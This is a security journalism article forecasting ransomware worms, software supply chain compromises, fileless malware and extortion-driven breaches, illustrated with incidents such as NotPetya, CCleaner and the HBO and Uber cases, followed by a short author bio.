Brace for Hybrid Threats and Extortion-Fueled Attacks Next Year

There’s no end in sight for ransomware and, based on what we’ve seen this year, these threats will become even more aggressive. Worse still, hackers have started incorporating extortion into other types of attacks.

Ransomware pushers have had their sights on businesses for a couple of years now. But recent outbreaks including WannaCry, NotPetya and BadRabbit have pushed risk to a whole new level, from paying a few thousand dollars to recover some important data to potentially suffering hundreds of millions in losses due to crippled systems and major operational downtimes.

Last month, pharmaceutical giant Merck reported that NotPetya cost the company $300 million in the third quarter due to lost sales and expenses resulting from forced production shutdowns. The company expects a similar impact to its Q4 financial results.

FedEx and logistics conglomerate Maersk also estimated $300 million in losses each after NotPetya disrupted their operations. In the UK, some clinics, hospitals and other National Health Service (NHS) trusts hit by WannaCry needed a week or more to fully recover, delaying appointments and putting patient health at risk.

What WannaCry, NotPetya and BadRabbit had in common is that all of them automatically spread through private networks by exploiting known vulnerabilities in common Windows services or by brute-forcing weak credentials.

Giving the success of these attacks, more and more cybercriminals will add network propagation components to traditional ransomware programs. This will ensure they can infect as many systems as possible and force companies to pay rather than experience prolonged operational downtimes. Welcome to the age of ransomware worms.

Another trend that’s expected to keep growing is the delivery of malware through compromised software update channels. These powerful supply chain attacks are very hard to detect because they exploit the inherent trust between users and vendors and take advantage of the privileges already given to installed software.

The NotPetya outbreak in June began in Ukraine after attackers compromised the updates to an accounting program popular in that country. Then, in August, Kaspersky Lab reported an attack in which hackers added a backdoor to a legitimate update for an enterprise server administration tool developed by NetSarang. A month later, attackers managed to inject malware into official builds of CCleaner, a Windows system optimization tool, infecting 2.2 million computers.

These were just the latest in a string of software supply chain attacks reported this year, most of which targeted businesses. Such compromises will only increase in frequency because malware delivered through compromised updates gets loaded by trusted software directly into a computer’s memory, bypassing application whitelisting and other advanced defenses.

The use of so-called fileless malware that runs only in memory, doesn’t create files on disk and uses registry entries for persistence, is a trend in itself. A large number of sophisticated attacks used this technique this year to compromise banks, government organizations and other enterprises.

These attacks typically combine malicious payloads with legitimate system administration and penetration testing tools including PowerShell, Mimikatz and Meterpreter. The tools are loaded directly into memory without ever touching the disk, making it very hard for traditional antivirus products to detect their use.

Inspired by the success of ransomware, hackers have also started to incorporate extortion into other types of attacks, such as distributed denial-of-service (DDoS) and data breaches. Many companies have received ransom notes this year from hackers who disrupted their online services or broke into their infrastructures and stole sensitive data.

A high-profile case involved a hacker stealing and later leaking unaired episodes of several HBO shows and a Game of Thrones script. The hacker asked the company for $6 million in Bitcoin, and the company reportedly offered him $250,000 under the guise of a bug bounty to delay the leak.

Last month, it came to light that Uber paid hackers $100,000 in 2016 to keep quiet about gaining access to information of 57 million Uber riders and drivers. And just recently, shipping company Clarkson announced that it’s expecting a leak of customer data after refusing to pay a ransom to hackers who breached its systems.

Extortion-fueled attacks are becoming more and more common, as cybercriminals seem to have found a new method of monetizing data breaches that’s easier than selling it on the black market, where it might take a while until they find a buyer.

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor’s degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at lucian@constantinsecurity.com or @lconstantin on Twitter. For encrypted email, his PGP key’s fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42

lucian-constantin has 58 posts and counting.See all posts by lucian-constantin